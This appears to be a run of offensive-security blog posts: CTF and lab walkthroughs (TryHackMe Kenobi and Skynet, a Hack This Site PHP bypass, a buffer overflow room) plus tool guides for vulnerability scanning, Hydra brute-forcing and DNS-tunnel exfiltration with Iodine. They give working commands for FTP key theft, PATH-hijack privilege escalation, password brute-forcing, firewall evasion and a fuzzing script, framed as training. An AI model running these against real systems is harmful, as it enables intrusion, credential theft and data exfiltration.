Hack Like A Jedi | Kenobi | TryHackMe

Hello World and welcome to HaXeZ, in this post we’re going to be channeling our inner Jedi and taking on the TryHackMe Kenobi room. This room requires you to perform some enumeration to identify services. Then, you need to enumerate SAMBA, NFS, and FTP. Next, you need to exploit a vulnerability in FTP to steal Kenobi’s private key and SSH to the server. Once on the server as Kenobi, you can escalate your privileges to root via a SUID file that uses unquoted paths.  

Kenobi Enumeration

First, I ran a Nmap scan with the safe scripts, service version, and operating system detection flags set. This revealed that there were 7 ports listening on the host. As can be seen, the important services found were FTP, SSH, HTTP, NFS, and Samba.

sudo nmap -sC -sV -O 10.10.182.106 -T4
Kenobi Nmap Scan
Kenobi Nmap Scan

Kenobi SAMBA Enumeration

Once the Nmap scan was complete, I enumerated the SAMBA shares. There are several Nmap scripts that can enumerate Samba shares, as seen in the image below. In short, the scripts used were ‘smb-enum-shares’ and ‘smb-enum-users’. As can be seen, it was possible to identify a total of 3 shares on the host. Furthermore, the IPC$ and Anonymous shares had read and write access.

sudo nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.182.106
Kenobi SAMBA Enumeration
Kenobi SAMBA Enumeration

Accessing SAMBA Shares

Using a tool called smbclient, it was possible to access the SAMBA shares and view the files. As a result, the Anonymous share (mapped to C:\home\kenobi\share) had a file called log.txt. I downloaded that file using the get command and opened a new tab to read the contents. Notably, the log file mentioned an SSH key being generated as well as the ProftpD service running on port 21.

Kenobi Log.txt
Kenobi Log.txt

Kenobi NFS Enumeration

After reviewing the results of the Nmap scan from earlier, I noticed that NFS was open on ports 111 and 2049. NFS is short for Network File System and is another way to share directories and files on the network. With this in mind, I enumerated the NFS service using a number of Nmap scripts. As can be seen below, the NFS share was exposing the /var directory.

sudo nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.182.106
Kenobi NFS Enumeration
Kenobi NFS Enumeration

Finding Vulnerabilities With Searchsploit

It’s time to start looking for a way to gain access to the machine. From our Nmap scan, we know that we have access to the /var NFS share. We also know that FTP is running and that at some point an SSH key was created. I used Searchsploit to look for vulnerabilities in the ProFTPD 1.3.5 service. The results indicate that there is a command execution vulnerability in this version of ProFTPD.

sudo searchsploit ProFTPD 1.3.5
Searchsploit

Exploiting FTP

Ordinarily, FTP will only grant us access to the directories and files in the directory specified in the FTP configuration file. However, as this version of FTP is vulnerable and is running as the Kenobi user, we can leverage that. We can copy the SSH key mentioned in the log file, and move it to a directory that we can access such as the NFS share /var. To do this we use the ‘SITE CPFR’ and ‘SITE CPTO’ commands as shown below.

nc 10.10.182.106 21
SITE CPFR /home/kenobi/.ssh/id_rsa
SITE CPTO /var/tmp/id_rsa
Coping the Kenobi SSH Key
Coping the Kenobi SSH Key

Stealing The SSH Key From NFS

Now that the SSH key is on the /var NFS share, we can mount that share and steal the key. In order to do this, we’re going to use the mount command. First, we need to make a directory to mount the NFS share to. I created a directory in ‘/mnt’ called kenobi2. Next, I mounted the ‘/var’ directory to that newly created directory and stole the SSH key.

sudo mkdir /mnt/kenobi2
sudo mount 10.10.182.106:/var /mnt/kenobi2
sudo cp /mnt/kenobi2/tmp/id_rsa ~/id_rsa
Mounting NFS and Stealing The Key
Mounting NFS and Stealing The Key

Kenobi Foothold

Now that we have Kenobi’s SSH private key we should be able to access the machine. First we need to change the permissions on the key to 600 to please the SSH gods. Once that is done we can SSH to the box using the SSH key which will grant us our foothold into the machine.

SSH To Box
SSH To Box

System Enumeration

Before we elevate our privileges to root and own the entire system, we need to find a way to do so. One common method of privilege escalation on the Linux system is via programs with the sticky bit set. The sticky bit means that the program retains root privileges when run by a normal user. There is more to it but I won’t explain the details in this write-up. So, we need to find all the files with the sticky bit set. The screenshot below shows the results of a find command used to find sticky bits. Essentially, it is looking for all files where the permissions have the sticky bit and then sending errors to ‘/dev/null’.

find / -perm -u=s -type f 2>/dev/null
Finding Sticky Bits on Kenobi
Finding Sticky Bits on Kenobi
Sticky Bit On Menu
Sticky Bit On Menu

Poking The Program

If you run the same command on your local system, you will notice that the ‘/usr/bin/menu’ binary is uncommon. Running this binary shows us that the program is indeed a bespoke program and it gives us three options.

Running /usr/bin/menu Binary
Running /usr/bin/menu Binary

If we run strings against that binary, we can get an idea of what’s going on. Furthermore, we can see how the creator of this binary made a crucial mistake. We can see that the three options correspond to three system binaries (curl, uname, and ifconfig). Unfortunately for the creator, but fortunately for us, they forgot to include the full path to the binary. As this is running with the sticky bit set we can modify our ‘$PATH’ environmental variable and create our own malicious versions of these binaries.

Strings on /usr/bin/menu Binary

Kenobi Privilege Escalation

First, I changed my directory to ‘/tmp’. Then I echoed the contents of the ‘/bin/sh’ binary into a file called curl. This will be our replacement malicious binary. I then gave the newly created curl binary, read, write, and execute privileges. Finally, I exported the ‘/tmp’ path in to our ‘$PATH’ environmental variable. Now, when we run the ‘/usr/bin/menu’ binary, it will look for the binaries in the ‘/tmp’ path first. And what will it find? our malicious curl binary.

cd /tmp
echo /bin/sh > curl
chmod 777 curl
export PATH=/tmp:$PATH
Creating curl binary and change path
Creating curl binary and change path

Now, when we run the ‘/usr/bin/menu’ binary and select the status check options, it runs our malicious curl binary as root and spawns a shell with root privileges.

Unlimited Power
Unlimited Power

Conclusions

This box was a lot of fun, I’m sure there was more to it that I didn’t explore. For example, there was a web server that I didn’t even look at. With the finale of the Kenobi series being released, I thought there was no better time to do a walkthrough of this box. Try and cash in on those delicious keywords. There was nothing out of the ordinary on this box, very typical enumeration and exploitation but it was still a fun box. Anyway, I hope you enjoyed the write-up, feel free to watch the video below.

Hack To Learn: Vulnerability Scanning

Hello World and welcome to HaXeZ, today I’m going to be covering Vulnerability Scanning. This post is continuing the Hack To Learn series where I cover the basics of the different phases of hacking or penetration testing. So far we have covered Environment Setup, Hacking Legally, and Open Source Intelligence Gathering.

Vulnerability Scanning

Once you have completed the open source intelligence gathering phase, it’s time to start looking for vulnerabilities. Vulnerability scanning is the process of using tools to scan your target for vulnerabilities. There are many different tools that can perform vulnerability scans and the type of target you are scanning will determine what tools you use. For example, if you’re looking for vulnerabilities that affect services on the host then you could use Nmap, Nessus, OpenVAS, and many others. However, if you’re attacking a web application then you would likely use Nikto, Burp Suite, OWASP ZAP, or some other tool.

Nmap Vulnerability Scanning

If you haven’t seen my post on Nmap then I would recommend giving it a read. It covers Nmap in more detail than I intend to do here. With that said, Nmap is a fantastic vulnerability scanner. Early in my IT career, I had many misconceptions about Nmap. I thought it was merely a network scanner used to identify what hosts were online and what services were running. How naive, Nmap is a comprehensive network auditing tool that can identify and exploit vulnerabilities. I use it on almost every project I’m on. I highly recommend reading more about the different flags and scripts before recklessly running them like I’m about to do.

The image below shows the output of a Nmap scan configured to find vulnerabilities. You can see from the results that it has found some CVEs. I first specified the ‘-g’ flag to set the source port to 53. This is useful for firewall evasion as some firewalls may be configured to allow DNS traffic in from any source. I then specified the ‘-f’ flag to fragment the packets. This works by splitting the packets into multiples of 8 which can also be beneficial for firewall evasion. Then, I specified ‘-sV’ to get the service versions and ‘-p0-‘ for all ports. Next, I specified the ‘–script’ argument followed by various categories of scripts to execute. Finally, I added the IP address and the ‘-T5’ to speed it up.

This configuration is incredibly reckless and you should never use it against production environments. I’m merely using it to demonstrate the power of Nmap. Do NOT do this.

sudo nmap -g 53 -f -sV -p0- -O --script vuln,auth,exploit 10.0.2.5 -T5
Nmap Vulnerability Scanning
Nmap Vulnerability Scanning

Nessus Vulnerability Scanning

Where to start! Nessus from Tenable is a powerful multifunctional vulnerability scanning and auditing solution. It can be used to scan entire ranges of IP addresses or perform audits from uploaded configuration files. Whether you’re on team red or blue, chances are you’ve used it or at least heard of it. Nessus is likely going to be your tool of choice when performing vulnerability assessments or full-on penetration tests. I will probably create a separate article and video focusing on Nessus as part of the Hacker Tools series. All you need to know for the moment is that it is an effective vulnerability scanner. They offer an essential version for you to play around and I highly recommend giving it a go. However, the professional version has many more cool toys.

The image below is of an advanced scan that I performed against the Metasploitable 2 virtual machine. I configured it to scan all ports (0-65535) and turned off the Denial of Service plugin. Other than that I only changed the reporting to report as much as possible. As you can see it has found a bunch of issues (as expected).

Nessus Vulnerability Scanning
Nessus Vulnerability Scanning

Nikto Web Application Scanning

Nikto is a free CLI web application vulnerability scanner. It will search for interesting directories and files, analyze response headers, check for outdated software, and look for vulnerabilities. It’s a good place to start when performing web application security assessments. Granted, it won’t hack into the website for you, but it will give you a good idea of things to look at during the early stages of the assessment. Nikto can be intrusive and I have seen web applications suffer performance issues when scanning them. However, the hardware that those apps were hosted on wasn’t fit for purpose. I’ve also found that Nikto can be tricked by web application firewalls. It will report a 200 response for every directory that it brute forces, even though it doesn’t exist. Or it will misidentify a vulnerability or some other incorrect server-side configuration.

Nikto
Nikto

Burp Suite Web Application Scanning

No vulnerability scanning article would be complete without Burp Suite from Portswigger. This is the Bugatti Veyron of web application vulnerability scanners. Unfortunately, I only have the community version installed in my home lab but I use the pro version almost daily. The pro version has many more features that allow for automated scanning and vulnerability detection. You still need to manually go through and verify those findings but Burp takes out a lot of the guesswork. It also has an extensive list of additional plugins that you can install to increase the functionality. If you’re looking to get a job in cybersecurity then knowing how to use Burp Suite will probably improve your chances once it comes to that technical test.

Burp Suite
Burp Suite

Conclusions

I know I have only scraped the surface on the different vulnerability scanners that are available. However, to cover them all would take forever and I only wanted to cover the ones that you are likely to come across first. Granted there are some amazing alternatives out there. Where you have Nessus, you also have OpenVAS. Where you have Burp Suite, you also have OWASP Zap. I’m not saying that one is better than the other, I suppose that comes down to personal preference and these tools are my personal preference. I know a guy who almost refuses to touch anything that isn’t command line based. Archie, I salute you. Anyway, definitely give these tools a try against your own test virtual machines. They are a lot of fun.

Hacking Tools: Hydra

Hello World and welcome to HaXeZ, today we’re talking about the brute forcing tool THC Hydra. According to Wikipedia, Hydra is a parallelized network logon cracker. It is available on a number of Penetration Testing Linux distributions such as Kali Linux, Parrot OS, Black Arch, and BackBox. Hydra has the ability to perform attacks against various different network services including Remote Desktop, Secure Shell, and many others. It is also capable of performing brute force attacks against web applications.

Installing Hydra

Hydra tends to come preinstalled on most penetration testing distributions. However, it can also be installed using apt. If your repositories don’t have Hydra for whatever reason then it can easily be installed from GitHub using git clone.

Installing Hydra
Installing Hydra

Hydra For Brute Forcing RDP

Remote Desktop Protocol or RDP is a remote management tool primarily used in Windows environments. It uses terminal services to allow users to connect to the target host using the RDP Client. The user will then be presented with a visual representation of the desktop. Furthermore, this will allow them to carry out management tasks. RDP is often attacked by hackers using automated tools like Hydra. Please see below for the syntax on how to attack RDP. The uppercase L specifies the user wordlist, the uppercase P specifies the password wordlist. The lowercase variants will allow you to specify individual words. The -F flag tells Hydra to stop once it has found a correct password. Then we specify the protocol, the IP address, and the verbosity.

sudo hydra -L usernames.txt -P passwords.txt -F rdp://10.0.2.5 -V
Hydra Brute Forcing RDP
Hydra Brute Forcing RDP

Brute Forcing SSH

SSH or Secure Shell is another remote management protocol. It is found in Linux or Unix environments but has recently been added to Windows. Furthermore, it is considered the successor to telnet. Telnet doesn’t use encryption so everything is transmitted in plaintext. If a threat actor were on your network performing a man-in-the-middle attack, they would be able to see your username and password transmitted to the telnet server. SSH is an encrypted protocol so if traffic was interncepted, it couldn’t be read. You can perform brute force attacks against SSH like so:

sudo hydra -L username.txt -P passwords.txt -F ssh://10.0.2.5 -V
Brute Forcing SSH
Brute Forcing SSH

Brute Forcing FTP

FTP is a protocol for transferring files and can also be subject to brute force attacks by Hydra. The syntax will be exactly the same as RDP and SSH. Just replace the protocol for FTP. You will notice a pattern start to emerge for basic network services. There is a lot more to Hydra and you can fine-tune your attacks to be more specific. To perform a brute force attack against FTP:

Sudo hydra -L username.txt -P passwords.txt -F ftp://10.0.2.5 -V
Brute Forcing FTP
Brute Forcing FTP

Brute Forcing Web Applications

You can also brute force web applications. However, the syntax to do so is a bit more complicated. You would start as we have done previously by specifying the username and password wordlist. However, you now need to specify the type of web attack whether it’s an “http-post-form” or “http-get-form” or whether it’s using basic authentication. Then you need to specify the path to the file to attack. Next, you need to specify the parameters to attack (username and password). Furthermore, you need to specify placeholders for the user and pass variables. Finally, you need to specify any cookies. You can see an example of this below:

hydra -L users.txt -P password.txt 10.0.2.5  http-post-form "/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -V
Damn Vulnerable Web App
Damn Vulnerable Web App

Hydra Graphical User Interface

There is a graphical user interface for Hydra. To launch it you need to run the xhydra command. If you prefer GUI’s then this could be your preferred method of using hydra. Personally I prefer using the command line, I genuinly find it easier to configure than the GUI.

Xhydra Gui
Xhydra Gui

Data Exfiltration, Firewall Evasion, and DNS Encapsulation with Iodine

Hello World and welcome to HaXeZ. Today I want to talk about the DNS tunneling software Iodine.  Or more specifically I want to talk about data exfiltration and firewall evasion via DNS encapsulation. If you haven’t read my article on DNS then I strongly recommend giving that a quick read-through beforehand.

Scenario

Envision a scenario where you’ve successfully socially engineered your way into a super-secret evil organization. You’ve bypassed physical security and have found a sneaky corner office with an ethernet port. You plug your laptop into the network and the DHCP server assigns you an IP address. Next, you compromise a host and attempt to ping your external Command and Control center (C2). You ping your domain name. The ping returns the correct IP address for your domain name but your pings all time out… what do you do?

Solution

Why would ping be able to resolve your domain names IP address but not be able to ping it? Other than the obvious ICMP packets being blocked, it could be that the network administrator has blocked all traffic except DNS. This is a common configuration to allow DNS resolution on the network, but fortunately, it is also susceptible to abuse. By using the DNS tunneling software Iodine, we can establish a tunnel to an external host and use it as a proxy to the internet.

Initial Set Up

In order to perform this type of attack, you will need an external server capable of running Iodine. Iodine should be compatible with most Linux distributions but for this demonstration, I’m going to be using a Debian-based cloud server. Furthermore, You will also need your own domain name and access to edit the DNS records for that domain. Finally, you will need a Linux machine to launch your attack. As you can see from the screenshot below, my IP address is currently set to 37.120.198.179 (it’s a VPN before you ask).

My Current IP Address before Iodine
My Current IP Address before Iodine

Iodine Domain Configuration

For this demonstration, I’m going to be using my spare domain haxr.one. It is currently registered with google and is using their nameservers. I don’t use the domain for anything, I bought it on a whim and am now deciding to do something with it. In order for Iodine to work, we need to create some records so that the Iodine server and client can communicate. As you can see from the screenshot below, I have created an A record of dnstunip which points to my Debian server’s IP address of 185.132.43.9. I then create an NS (nameserver) record of dnstun and point it to the A record (dnstunip.haxr.one).

Iodine DNS Records
Iodine DNS Records

Iodine Server Configuration

On Debian, Iodine can be installed by simply running apt-get install iodine. That’s it, that’s all the installation you need to do unless Iodine isn’t found in the repositories. If that happens, you can clone it directory from the GitHub repository but they have documentation on how to do that. Once Iodine is installed you need to tell it to start listening for DNS queries for your domain. In order to do this, you need to run iodined (the server-side software). As you can see from the screenshot below I have started iodined and set the password of SecretPassword1337, the local IP address of 10.0.0.1, and the domain of dnstun.haxr.one. The local IP address is the IP address that the DNS tunnel is going to use to communicate with the client.

sudo iodined -f -c -P SecretPassword1337 10.0.0.1 dnstun.haxr.one
Iodine Server Set Up
Iodine Server Set Up

You should now be able to check that your Iodine server is set up correctly by visiting https://code.kryo.se/iodine/check-it/ and popping in your domain name.

Checking Iodine Server Configuration
Checking Iodine Server Configuration

Iodine Client Configuration

Once you have the server running, head back to your client and with sudo, run:

sudo iodine, -f -P SecretPassword1337 dnstun.haxr.one. 

Where the password is your password and the dnstun.haxr.one is your domain. This will then send DNS queries to the server to determine whether it can communicate with it. The client and server will then determine the upstream and downstream configurations and finally create the tunnel. The client should now have a new network interface called dns0 or something similar. The IP address of that interface will be set to an IP within the range that you specified on the server (10.0.0.X). That’s it, you now have a connection to the server. You can SSH into it and communicate with the outside world.

Iodine Client Set Up
Iodine Client Set Up

It’s also worth launching Wireshark and watching the DNS traffic being sent and received. It is quite bizarre seeing the length of some of the requests and responses. You can see from the screenshot below that the DNS traffic isn’t normal. However, Wireshark doesn’t seem to think there is a problem with it and unless there are devices on the network configured to look for this type of traffic then it probably won’t get flagged.

Wireshark PCAP
Wireshark PCAP

The Cherry On Top

Ok, but what if you want to browse the internet while you have this DNS tunnel established? There’s an SSH trick for that. If you SSH to the DNS tunnel servers IP address (10.0.0.1) and specify a few arguments, you can dynamically port forward traffic to your localhost. This means that by setting a proxy configuration in your browser to localhost and the specified port, you can browse the web. The command is:

sudo ssh -N -D 9090 [email protected] 

where 10.0.0.1 is the IP address of the server’s DNS tunnel IP and 9090 is the local port you want to forward to. The -N argument just means no command execution and the -D argument is the dynamic port forwarding flag that makes the magic happen.

SSH Dynamic Port Forwarding
SSH Dynamic Port Forwarding

Iodine Browser Configuration

Once that’s done, you can head to your browser’s proxy settings and manually configure a SOCKS proxy on the specified port. Save the changes and you should now be able to browse the web. As you can see from the screenshot below, I have created the SOCKS proxy and when visiting the what is my IP website, it tells me that my IP address is now the IP address of our Debian cloud server.

Browser Proxy Settings
Browser Proxy Settings
What is my IP showing the IP of the server
What is my IP showing the IP of the server

Concerns

So why is this a problem? Well, it’s using DNS to exfiltrate data out of an otherwise restricted network. There are plenty of places such as banks, prisons, and other government facilities where internet access might be restricted for genuine reasons. These places do not want sensitive information to escape their network. Banks don’t want their client’s data stolen, prisons don’t want their inmates communicating with the outside world and governments don’t want their secrets leaked. Additionally, if a hacker were able to implant an easily concealed device into a network it could act as a backdoor into that network. This is also how some malware communicates back to the command and control center to receive instructions.

Mitigations

How do you mitigate a service that is behaving as it is expected to? Well, there are actually a number of options. First, you could add domain allow and block lists to your configuration. By blocking known malicious domain names, you ensure that a DNS tunnel can’t be established to that domain name. However, a hacker could just register a new domain name and use that. A better approach is to use an allow list whereby only traffic from specific domains is allowed into the network.

An even better approach is to implement a device that performs traffic/packet inspection. There are a number of devices out there that will identify malicious DNS traffic and block it. You saw from the Wireshark screenshots that the DNS tunnel traffic stands out like a sore thumb. It is easily distinguishable from genuine DNS traffic.

Conclusions

I thought this was a fantastic technique when I first come across it. A colleague/friend of mine recommend it to me while I was on an engagement and sure enough, it worked. I was shocked as I didn’t think it would be possible to encode data like that into DNS queries. You can have a full-blown conversation with another computer by smuggling it through DNS.

Hacking PHP Web Applications and Bypassing Authentication Mechanisms | Hack This Site – ExtBasic 6

Hello World and welcome to HaXeZ, today we’re going to be looking at Hack This Site ExtBasic 6. Solving this challenge requires some basic knowledge of PHP or any other language for that matter. It’s a simple challenge that shows how poorly coded web application authentication mechanisms can be bypassed.

The Challenge

The image below shows the PHP that makes up the authentication mechanism. Furthermore, This is the code that we need to exploit in order to bypass the authentication mechanism. The introduction text at the top explains that the sysadmin is a noob and that the script is located at http://moo.com/moo.php. Therefore, to solve this challenge we need to append the correct syntax to the end of the URL and submit it to the submission form.

The PHP Code
The PHP Code

The PHP Code

The snippet below is the exact code we’re going to be exploiting. Furthermore, there is no backend database to worry about, just some simple PHP logic that we can leverage for our own nefarious purposes.

<?php
        $user = $_GET['user'];
        $pass = $_GET['pass'];
        if (isAuthed($user,$pass))
        {
                $passed=TRUE;
        }
        if ($passed==TRUE)
        {
                echo 'you win';
        }
?>
        <form action="me.php" method="get">
        <input type="text" name="user" />
        <input type="password" name="pass" />
        </form>
<?php
        function isAuthed($a,$b)
        {
                return FALSE;
        }
?>

Breaking Down The Code

We’re going to break the code down line by line in order to solve this challenge. Once we understand what the code is doing, we will be able to use its own logic against it and bypass authentication.

First, the code starts with it a tag telling us what language it is.

<?php

Next, we have two variables being set from user input. The $user and $pass variables are populated by the values of ‘user’ and ‘pass’. This is more evident later on when looking at the HTML form.

$user = $_GET['user'];
$pass = $_GET['pass'];

This is where the logic beings. When the user submits their username and password, the data is passed to an if statement. If the values of the variables ‘$user’ and ‘$pass’ are correct then the variable ‘$passed’ is set to true.

if (isAuthed($user,$pass))
{
        $passed=TRUE;
} 

After that, the application uses another if statement to check whether the value of the variable ‘$passed’ is set to true. If ‘$passed’ is set to true then the application echos out “you win”. This also ends the first section of PHP.

if ($passed==TRUE)
{
        echo 'you win';
}
?>

Now, we move on to the HTML. This is the login form that the user will send when loading the page in their browser. It is fairly standard and just performs a get request to me.php. The contents of the get request or the values of the input for ‘user’ and ‘password’. The user input type is text and the password input type is password.

<form action="me.php" method="get">
<input type="text" name="user" />
<input type="password" name="pass" />
</form>

Finally, we have the last section of PHP. This is the function that checks to see whether the username and password are correct. This function compares the values of variables ‘$user’ and ‘$pass’ with the variables ‘$a’ and ‘$b’. If they match then it is the first if statement is executed.

<?php
        function isAuthed($a,$b)
        {
                return FALSE;
        }
?>

The Solution

With that rather long explanation out the way, we can now move on to solving the challenge. It’s pretty simple if you know how to PHP site URL’s work. We know that in order for us to authenticate, the variable ‘$passed’ needs to be set to ‘TRUE’

PHP allows you to specify variables and their contents in the URL. For example, a dynamic PHP website using a CMS like WordPress may have a URL like HTTP://site.com/index.php?page=1. The question mark indicates that what follows is a variable and in this case, the variable is ‘$page’. Furthermore, we can specify that we want the value of the page variable to be 1.

With this in mind, we can take the provided URL of HTTP://moo.com/moo.php and append a question mark followed by the variable passed equals TRUE, as seen below.

http://moo.com/moo.php?passed=TRUE

Submitting this to the input box will solve the challenge.

Hacking The Skynet Mainframe and Preventing Judgement Day

We took technology for granted. Laughed at the suffering of the robots we had enslaved. Dismissed the warnings of the mainstream media. If was over before it began. Skynet, an interconnected neural defense network became self-aware. We didn’t stand a chance.

I was sent back from the future by the leader of the resistance John Connor, my mission is to hack into the Skynet mainframe and destroy it before it becomes self-aware. I have infiltrated a Skynet data center and jacked into their network. If you’re listening to this, you are the resistance.

Hello World and welcome to HaXeZ. Cheesy intros aside, today we’re going to be hacking the Skynet box on TryHackMe.  I came upon this box while going through the Offensive Security Learning path. The Box was a lot of fun so I wanted to make a write-up and create a video about it. The foothold requires some enumeration of Samba and web services. Then exploiting an outdated Content Management System to perform local and remote file inclusion to gain a reverse shell.

Skynet Host Enumeration

I ran a Nmap scan with the safe scripts, service version, and Operating System detection flags set against all ports. The scan came back and revealed that SSH, Apache, Dovecot, and Samba were listening on the server. As a result, we have a large attack surface to go after. We could start by brute forcing SSH. However, as there are plenty of other services to go after let’s start with the web server.

Skynet Nmap Scan
Skynet Nmap Scan

Skynet Web Server Enumeration

The initial landing page of the web server appears to a Skynet search engine. However, submitting search parameters to the submission form didn’t appear to do anything. Therefore, I decided to run DIRB (with a custom wordlist) against the webserver to see if there were any juicy directories. While DIRB was running, I started to enumerate the Samba shares to see if I had access to anything.

Skynet Search Engine
Skynet Search Engine
Dirb Directory Brute Force
Dirb Directory Brute Force

SMB Enumeration

I used the tool smbclient with the list argument to list the shares that were exposed on the host. Notably, there were a number of shares available but the one named anonymous caught my eye. Perhaps this anonymous share would allow me to explore it without authenticating. Success, we were able to access the anonymous share and found a number of files including attention.txt, log1.txt, log2.txt, and log3.txt. The contents of the attention.txt document revealed that the host had recently encountered a misconfiguration and that all users needed to change their passwords. The text document was signed by none other than Miles Dyson. Furthermore, the log1.txt document contained a list of terminator names. Perhaps this was a password list.

smbclient SMB Enumeration
smbclient SMB Enumeration

Squirrelmail

Heading back to my DIRB scan I noticed that it had found a directory called SquirrelMail. Furthermore, upon visiting this directory we were greeted with a login page. With the username milesdyson and the log1.txt wordlist we found on the Samba share, I launched Burp Suite and started a brute force attack.

Squirrel Mail
Squirrel Mail

Comparing the results of the Burp Suite brute force attack revealed that one of the attempts was successful. The response length was different and the HTTP status code showed a 302 redirect instead of a 200 message. In other words, instead of loading a page with an error message saying the credentials were incorrect, it redirected me to the mail portal.

Burp Suite Brute Force
Burp Suite Brute Force

Samba Password

I read through Miles Dyson’s emails and noticed he had received an email from [email protected]. Additionally, this email was informing Mr. Dyson that his Samba password had been changed. The email actually included the new password. Loaded with that new information, I headed back to my terminal and attempted to mount the /milesdyson share with the milesdyson username and the new password. It worked! The share was full of documents about AI neural networks but there was also a text document named important.txt This new text document mentioned a Content Management System under a new directory. This directory was a random combination of letters and numbers so it is unlikely that a directory brute force attack would have found it.

Miles Dyson Samba Directory
Miles Dyson Samba Directory

Deeper Directories

Armed with this new directory, I ran another DIRB against it and found that there was a directory called administrator. Navigating to this directory loaded a new login portal for a Content Management System called Cuppa CMS.

Cuppa CMS
Cuppa CMS

After trying some basic credentials I went back to my terminal and used searchsploit to see if there were any vulnerabilities. Sure enough, there was a local and remote file inclusion vulnerability that would allow a threat actor to load local files on the system such as the passwd file as well as force the server to execute files hosted remotely.

SearchSploit
SearchSploit

Catching A Reverse Shell

After testing out the local file inclusion vulnerability, I headed to Pentestmonkey’s PHP reverse shell on Github.com. I grabbed the raw URL and downloaded it locally and then amended it to include my IP address and desired port of 443. Then I used the Python3 HTTP module to start a webserver on port 80. I created a NetCat listener on port 443 and then appended the link to the reverse shell into the Cuppa CMS URL. After hitting enter I was greeted with that glorious message of Connect to from unknown. The reverse shell had worked and I was now on the system.

Reverse Shell
Reverse Shell

Skynet System Enumeration

I poked around on the system for a bit and was able to capture the user flag from the milesdyson home directory. I also noticed a backup.sh file that appeared to be backing up everything in the /var/www/html directory with Tar. Furthermore, this backup.sh script was owned by root. I decided to cat out /etc/crontab to see whether this was running as a cron job. Sure enough, it was, the job was running as root every hour, minute, and second.

Skynet Enumeration
Skynet Enumeration

Privilege Escalation

The end to Skynet was within reach. I headed over to GTFO bins and searched for Tar. There was an entry for Tar using a feature called checkpoints. These checkpoints allow for the execution of arbitrary actions or commands. By creating a checkpoint I could instruct Tar to execute a command of my choosing. Based on a write-up on https://steflan-security.com I decided to create a bash script that copied /bin/bash to /tmp and then change the permissions to include the setUID bit. This means that when the backup.sh cron job runs, Tar would create a bash binary in /tmp that would elevate me to root. After a bit of trial and error, the exploit worked and by appending the -p argument I was able to get root and capture the root flag.

Privilege Escalation
Privilege Escalation

Conclusions

This was a great box and I loved the theme of it. I don’t know why but I always find boxes with a strong theme more engaging. It’s like the websites on hackthissite.org, if I’m supposed to be hacking some super evil person then I’m more inclined to succeed. Perhaps my imagination is running away with me. Either way, this is a great box, I would personally rank it as a medium difficulty box mainly because I struggled with the last step. I had to terminate (excuse the pun) the existing machine and start again to get it to work. I loved the remote file inclusion vulnerability, that was insanely cool. Anyway, until next time. Kind Regards.

Exploiting Buffer Overflows on TryHackMe

Hello World, and welcome to HaXeZ. Today I want to talk about Buffer Overflows. I’ve struggled with Buffer Overflows for a long time. In other words, I understood the concept but always had trouble applying it practically. Recently I have buried my head in the sand and have just sunk hours into TryHackMe. I came across the buffer overflows learning path and finally understand so now I’m bringing you this article.

Buffer Overflows Setup

The First thing we need to do is to head to TryHackMe and head to the Buffer Overflows Prep room. You can find the room here. Next, we need to spawn the machine and grab the IP address. You can then remote desktop from your Linux virtual machine to the new IP address using Remmina.

Setting Up Immunity

Once connected via RDP to the Windows Machine, launch Immunity as an Administrator and configure Mona using the following command.

"!mona config -set workingfolder c:\mona\%p"
Configuring Mona On Immunity Debugger
Configuring Mona On Immunity Debugger

After immunity has been configured, you can open the oscp.exe program which is found in the vulnerable program’s directory. You can then run the program by clicking the red arrow. Feel free to poke around on the program by connecting to it using netcat on port 1337.

Fuzzing The Program

We need to fuzz the program to see if it is vulnerable. We do this by sending it a long string of characters. In essence, This long string of characters will eventually exceed the memory buffer causing the buffer overflow. That drastically simplifies the process but let’s start fuzzing the program. Grab the script below and amend it with the IP address of the host and the overflow you want to target.

#!/usr/bin/env python3
import socket, time, sys
ip = "10.10.237.191"
port = 1337
timeout = 5
prefix = "OVERFLOW1 "
string = prefix + "A" * 100

while True:
  try:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
      s.settimeout(timeout)
      s.connect((ip, port))
      s.recv(1024)
      print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
      s.send(bytes(string, "latin-1"))
      s.recv(1024)
  except:
    print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
    sys.exit(0)
  string += 100 * "A"
  time.sleep(1)

Ensure the program is running then launch the fuzzing script. Additionally, make a note of the number of bytes it takes to crash the program.

"python3 fuzz.py"
Buffer Overflow Fuzzing
Buffer Overflow Fuzzing

Create a Cyclic Pattern

Finding the EIP offset requires us to create a pattern with the length that was required to crash the program. For example, we can use Metasploit to create a Cyclic Pattern by using the command below. However, an additional 400 bytes should be added to the pattern. As it took 2400 bytes to crash the program we will create a pattern of 2400.

   /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2400     
Metasploit Creating Cyclic Pattern
Metasploit Creating Cyclic Pattern

Next, you need to edit the python payload below and add the Cyclic Pattern to the payload variable. Please be advised that I have snipped some out to save space so the below payload won’t work. Generate and use your own.

import socket

ip = "MACHINE_IP"
port = 1337

prefix = "OVERFLOW1 "
offset = 0
overflow = "A" * offset
retn = ""
padding = ""
